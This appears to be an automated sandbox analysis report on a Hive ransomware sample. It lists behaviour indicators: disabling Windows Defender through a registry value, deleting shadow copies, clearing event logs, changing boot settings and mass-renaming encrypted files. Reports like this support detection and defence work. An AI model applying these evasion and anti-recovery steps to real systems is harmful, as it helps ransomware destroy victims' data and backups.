Analysis Overview
SHA256
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
Threat Level: Known bad
The file 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Clears Windows event logs
Modifies boot configuration data using bcdedit
Deletes shadow copies
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Interacts with shadow copies
Runs ping.exe
Suspicious use of WriteProcessMemory
Runs net.exe
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 14:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 14:09
Reported
2022-01-12 14:14
Platform
win7-en-20211208
Max time kernel
128s
Max time network
131s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ExitTrace.png => C:\Users\Admin\Pictures\ExitTrace.png.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportSearch.tiff => C:\Users\Admin\Pictures\ExportSearch.tiff.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InstallUnregister.tiff => C:\Users\Admin\Pictures\InstallUnregister.tiff.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InstallUnregister.tiff.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SelectSearch.tif.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WaitExit.raw => C:\Users\Admin\Pictures\WaitExit.raw.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExitTrace.png.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportSearch.tiff.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SelectSearch.tif => C:\Users\Admin\Pictures\SelectSearch.tif.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WaitExit.raw.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOVEL.WAV.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\RequestPublish.html.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLBAR.INF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SPANISH.LNG.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21527_.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02233_.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_F_COL.HXK.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\QUIKPUBS.POC.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\js\calendar.js | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\rFSH_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InputPersonalization.exe.mui | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgRes.dll.mui.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21434_.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Media Renderer\DMR_120.jpg | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\msdaorar.dll.mui | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DVDHM.POC.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\TURABIAN.XSL.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\FAXEXT.ECF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Oslo.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21533_.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\js\timeZones.js | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14793_.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR23F.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00256_.WMF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_IAAAACAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_ON.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14866_.GIF.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\header.gif.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsImageTemplate.html.mj8BSwxv3tCgWLiiN268gs5_smliftOvVJlGlxoPCSb_AAAAAAAAAAA0.bvddx | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
